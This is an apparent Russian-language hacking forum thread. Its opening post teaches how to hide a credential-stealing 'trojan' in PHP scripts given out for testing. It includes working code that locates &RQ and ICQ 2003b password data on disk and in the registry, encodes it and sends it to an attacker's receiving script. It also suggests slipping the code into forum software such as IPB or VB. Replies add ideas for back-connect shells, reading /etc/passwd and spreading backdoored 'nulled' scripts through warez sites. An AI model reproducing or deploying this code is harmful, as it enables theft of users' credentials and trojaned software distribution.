Даем скрипты на тест или как украсть данные. Пришла в голову идея: а что если внедрить в наш пхп-код "трояна"? В этой статье я покажу все на примере кражи пароли из &RQ и icq 2003b, других клиентов у меня под рукой нет =) &RQ Просканируем основне папки, где он может лежать на наличие папки &RQ PHP: <?php $dir = scan_dir(); function scan_dir(){ //Папка с крысой $rq = '&rq'; //Папки, где она может быть $da = array( "C:\\", "D:\\", "E:\\", "C:\\Program Files\\", "D:\\Program Files\\", "E:\\Program Files\\" ); foreach($da as $d){ if(file_exists($d.$rq) AND is_dir($d.$rq)) return $d.$rq; } return false; } if($dir){ $temp = opendir($dir); while (false !== ($file = readdir($temp))) { if(is_dir($dir.'/'.$file) AND is_numeric($file)) { if(file_exists($dir.'\\'.$file.'\\andrq.ini')){ $arr = file($dir.'\\'.$file.'\\andrq.ini'); foreach($arr as $a){ if(stristr($a, 'crypted-password')){ $pass .= base64_encode("Number: $file , Password: $a ")."\n"; break; } } } } } } ?> Вы наверное скажете, ведь можно было просканировать весь жесткий диск на наличие этой папки... А я вам в ответ: попробуйте, потом напишите мне , сколько времени у вас ушло на 200гб диск Ну что же, мы получили данные, в случае удачи. Теперь как их нам отослать? Самое простое что приходит в мозги - послать по мылу. Но давайте вспомним, что у большинства тестеров стоит денвер с его заглушкой. Хм... Тогда отправим данные к нам на серрвер. Для начала создадим принимающий скрипт PHP: <?php $str = $_POST['str']; $log = 'passwords'; $f = fopen($log, 'a'); fwrite($f, "\n ========== \n" . $str . "\n ========== \n"); fclose($f); ?> Теперь отсылаем ему данные: PHP: <?php $host = 'localhost'; $fp = fsockopen ($host, 80, $errno, $errstr, 10); $r = "POST /pass.php HTTP/1.1 Host: $host Content-Type: application/x-www-form-urlencoded Content-Length: ".strlen($pass)." str=$pass"; fputs ($fp, $r); fclose($fp); ?> ICQ 2003b Тут гораздо проще... PHP: <?php //Возьмем данные из реестра и запишем их в отдельный файл) unset($pass); @system("reg export HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners tmp"); //Прочтем файл $pass = urlencode(base64_encode(file_get_contents('tmp')))."\n\n"; //пошлем данные $host = 'localhost'; $fp = fsockopen ($host, 80, $errno, $errstr, 10); $r = "POST /pass.php HTTP/1.1 Host: $host Content-Type: application/x-www-form-urlencoded Content-Length: ".strlen($pass)." str=$pass"; fputs ($fp, $r); fclose($fp); //удалим файл @unlink('tmp'); ?> Отлично! Все сделали Как просмотреть? Просто раскодируйте строку из файла passwords, например PHP: <?php echo urldecode(base64_decode("sdsdsd")); ?> Для расшифровки паролей можно воспользоваться программой http://www.tolkuchka.dsip.net/index.php?showtopic=19516 Теперь скажете вы, кто же запустит такой скрипт? Да никто Но а что если его проинклудить в том же IPB или VB? Врядли кто будет просматривать все файлы перед запуском... В общем - проявляйте фантазию =)
Попробую попользоваться... =) 1 вопросик (почти по теме): Вот у меня идея появилась, не знаю возможно ли такое. Все наверное видели форму для загрузки файлов на файлообменники, а что если сделать такую страничку, заходя на которую, в поле для выбора файла стояло бы такое значение c:\program files\qip\config.txt и javascript'ом автоматически нажимать кнопку и файл пользователя загружался бы на сервер?
Iceangel_ к сожалению разработчики хтмля, javascript и браузеров тоже не дураками были =))) никто кроме пользователя не может ввести путь к файлу загрузки.
небольшой офф я вообще все скрипты исключительно на веб сервере тестю - нет привычки на локалке запускать :\ в таких случаях можно было бы вставить что-нибудь пытающееся поднять себе права и просмотреть ../../../etc/passw
писал такую "гадость" с бекконектом на мой комп если комунить интересно, голосуем в моей репе за новую статью :dd +1 хватит, хотя лучше больше))
мдя... http://forum.antichat.ru/thread34814.html ) ну лан, значит дополню его статью))) у меня угарные методы шифрования были )
Надо было в закрытые, так как такие вещи не афишируются - будет массовый раздрай. А скрипты для теста легко предоставлять. Делается псевдо релиз нуленого скрипта оформленного по правилам СкриптМафии или ДГТ (с подделкой их чексуммы (точнее - ее эммуляции)). Вываливается на два-три варез портала и... ...и дальше скрипты начинают сами гулять по сети, множась по варезникам. p.s. По тому принципу что выше - уже полтора месяца идет эксперимент для статьи "Нуллед или не Нуллед". Правда ни вебшел, ни дырки не внедрялись. Но там тоже есть своя фишка. О конечных результатах пока рановато конечно говорить (из-за специфики), но работает относительно хорошо. О полных результатах расскажу позже (через пару месяцев). p.s.s. К Куби это не имеет никакого отношения. Я не падонак. Да, Киборг эту всю кашу и заварил. В хорошем смысле. Тока как часто и бывает - на отличные решения мало кто внимание обращает. Кроме гринов =)
Когда киборг писал статью - меня не было в интернете не до, не после в течении долгого времени)) Видеть я ее не мог) А я блин обрадовался, думал первый идею выложу) эх.